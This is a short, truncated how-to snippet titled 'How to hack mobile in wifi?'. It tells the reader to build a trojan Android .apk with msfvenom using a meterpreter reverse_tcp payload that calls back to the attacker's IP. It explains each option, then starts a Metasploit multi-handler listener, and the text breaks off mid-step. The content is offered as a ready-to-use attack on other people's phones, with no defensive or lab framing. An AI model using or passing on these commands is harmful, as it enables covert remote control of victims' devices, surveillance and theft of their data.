How to hack mobile in wifi?
Procedure: Step 1: Fire-Up Kali: · Open a terminal, and make a Trojan .apk · we can do this by typing : msfvenom -p android/meterpreter/reverse_tcp LHOST= LPORT= R > FILENAME.apk • -p => Specify Payload • LHOST => Your IP or DDNS • LPORT => Port You want to listen on • R => Means RAW Format • >/root/FILENAME.apk => Location for File Step 2: Open Another Terminal: · Open another terminal until the file is being produced. · Load metasploit console, by typing : msfconsole Step 3: Set-Up a Listener: · After it loads, load the multi-handler expl...